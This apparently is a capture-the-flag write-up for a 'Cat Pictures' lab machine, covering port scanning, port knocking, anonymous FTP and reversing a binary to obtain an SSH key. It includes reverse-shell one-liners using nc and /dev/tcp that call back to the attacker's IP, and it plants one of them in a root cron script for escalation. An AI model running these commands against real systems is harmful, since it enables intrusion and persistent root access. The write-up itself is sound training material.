1. Scanning & Enumeration
We do the below scans in parallel.
1.1. Port Scanning
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
| 256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_ 256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
8080/tcp open http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Info gathered:
- SSH on 22 open
- HTTP on 8080 open
1.2. Web Enumeration
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 'php,html,txt' -t 108 -q -u http://10.10.153.40:8080
/faq.php (Status: 301) [Size: 462] [--> /app.php/help/faq?sid=0f2b319a8907b891633fc255b6e4601e]
/download (Status: 301) [Size: 242] [--> http://10.10.153.40:8080/download/]
/feed (Status: 200) [Size: 1462]
/feed.php (Status: 301) [Size: 298] [--> /app.php/feed]
/common.php (Status: 403) [Size: 199]
/images (Status: 301) [Size: 240] [--> http://10.10.153.40:8080/images/]
/index.php (Status: 200) [Size: 13114]
We could epxlore these later on.
1.3. Web Exploration
homepage of the website
The post asking us to do port-knocking
Info gathered:
- Registeration does not work - a page is present syaing all email related stuff will not work.
- Login bruteforce could be one option we are looking at.
1.4. Knock knock, whos there?
Let’s knock at all the ports. This will probably open up some more ports for us to explore.
┌──(kali㉿kali)-[~]
└─$ telnet 10.10.239.160 1111
Trying 10.10.239.160...
telnet: Unable to connect to remote host: Connection refused
┌──(kali㉿kali)-[~]
└─$ telnet 10.10.239.160 2222
Trying 10.10.239.160...
telnet: Unable to connect to remote host: Connection refused
┌──(kali㉿kali)-[~]
└─$ telnet 10.10.239.160 3333
Trying 10.10.239.160...
telnet: Unable to connect to remote host: Connection refused
┌──(kali㉿kali)-[~]
└─$ telnet 10.10.239.160 4444
Trying 10.10.239.160...
telnet: Unable to connect to remote host: Connection refused
1.5. Full Port Scan
After port knocking, we do a full port scan. We are expecting 2 more ports here. 4420 and 21. You may need to do another scan if only 4420 is open.
The port 4420 reveals:
┌──(kali㉿kali)-[~]
└─$ telnet 10.10.239.160 4420
Trying 10.10.239.160...
Connected to 10.10.239.160.
Escape character is '^]'.
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
password
Invalid password...
Connection Closed
Connection closed by foreign host.
How about port 21?
┌──(kali㉿kali)-[/tmp]
└─$ ftp 10.10.239.160
Connected to 10.10.239.160.
220 (vsFTPd 3.0.3)
Name (10.10.239.160:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Apr 02 14:32 .
drwxr-xr-x 2 ftp ftp 4096 Apr 02 14:32 ..
-rw-r--r-- 1 ftp ftp 162 Apr 02 14:32 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 0.00 secs (102.3306 kB/s)
ftp>
221 Goodbye.
We get the note.txt file having a password!
┌──(kali㉿kali)-[/tmp]
└─$ cat note.txt
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.
Connect to port 4420, the password is {password_was_here_yee}.
- catlover
Okay. Now we can enter into the port 4420!
2. Foothold
NOTE: DO NOT USE telnet $IP $PORT, use netcat as nc $IP $PORT instead. Now, put in the password.
ls -la /home/catlover
total 28
drwxr-xr-x 2 0 0 4096 Apr 3 01:34 .
drwxr-xr-x 3 0 0 4096 Apr 2 20:51 ..
-rwxr-xr-x 1 0 0 18856 Apr 3 01:35 runme
Ah this file asks us to get a proper shell first. Here’s what you do:
- On the attacked machine:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.8.184 1337 >/tmp/f - On your machine:
nc -lnvp 1337
Now, we can run the file as below:
# ./home/catlover/runme
Please enter yout password: ilikecats
Access Denied
#
2.1. Reversing
-
Get the file on your machine. I used netcat.
-
Doing
stringswe get some intersting information:
{password_was_here}
Please enter yout password:
Welcome, catlover! SSH key transfer queued!
touch /tmp/gibmethesshkey
Access Denied
Once you execute the file ./home/catlover/runme, put the password. Dont' forget to touch /tmp/gibmethesshkey so that id_rsa appears in the user folder.
# cat /home/catlover/id_rsa
-----BEGIN RSA PRIVATE KEY-----
...
3. PrivEsc
┌──(kali㉿kali)-[/tmp]
└─$ ssh -i id_rsa catlover@10.10.239.160
The authenticity of host '10.10.239.160 (10.10.239.160)' can't be established.
ECDSA key fingerprint is SHA256:7HBac/JH7EKQik9kL1l9GMjCgLN/69gfXalu5cbPi4U.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.239.160' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Jun 27 20:31:52 PDT 2021
System load: 0.12
Usage of /: 37.1% of 19.56GB
Memory usage: 69%
Swap usage: 0%
Processes: 113
Users logged in: 0
IP address for eth0: 10.10.239.160
IP address for br-98674f8f20f9: 172.18.0.1
IP address for docker0: 172.17.0.1
52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Last login: Fri Jun 4 14:40:35 2021
root@7546fa2336d6:/# id
uid=0(root) gid=0(root) groups=0(root)
Looks like a docker container (from the name of the machine).
root@7546fa2336d6:/# ls -la
total 108
drwxr-xr-x 1 root root 4096 Mar 25 16:18 .
drwxr-xr-x 1 root root 4096 Mar 25 16:18 ..
-rw------- 1 root root 588 Jun 4 23:39 .bash_history
-rwxr-xr-x 1 root root 0 Mar 25 16:08 .dockerenv
...
Wait .bash_history … ?
root@7546fa2336d6:/# cat .bash_history
exit
exit
exit
exit
exit
exit
exit
ip a
ifconfig
apt install ifconfig
ip
exit
nano /opt/clean/clean.sh
ping 192.168.4.20
apt install ping
apt update
apt install ping
apt install iptuils-ping
apt install iputils-ping
exit
ls
cat /opt/clean/clean.sh
nano /opt/clean/clean.sh
clear
cat /etc/crontab
ls -alt /
cat /post-init.sh
cat /opt/clean/clean.sh
bash -i >&/dev/tcp/192.168.4.20/4444 <&1
nano /opt/clean/clean.sh
nano /opt/clean/clean.sh
nano /opt/clean/clean.sh
nano /opt/clean/clean.sh
cat /var/log/dpkg.log
nano /opt/clean/clean.sh
nano /opt/clean/clean.sh
exit
exit
exit
Huh. Interesting.
3.1. Exploiting Shady File
I edited the file and put a reverse shell (similar to the one in the bash history).
root@7546fa2336d6:/# nano /opt/clean/clean.sh
root@7546fa2336d6:/# cat /opt/clean/clean.sh
#!/bin/bash
sh -i >& /dev/tcp/10.17.8.184/7331 0>&1
wait some time …
# cat root.txt
Congrats!!!
Here is your flag:
...
And we are done!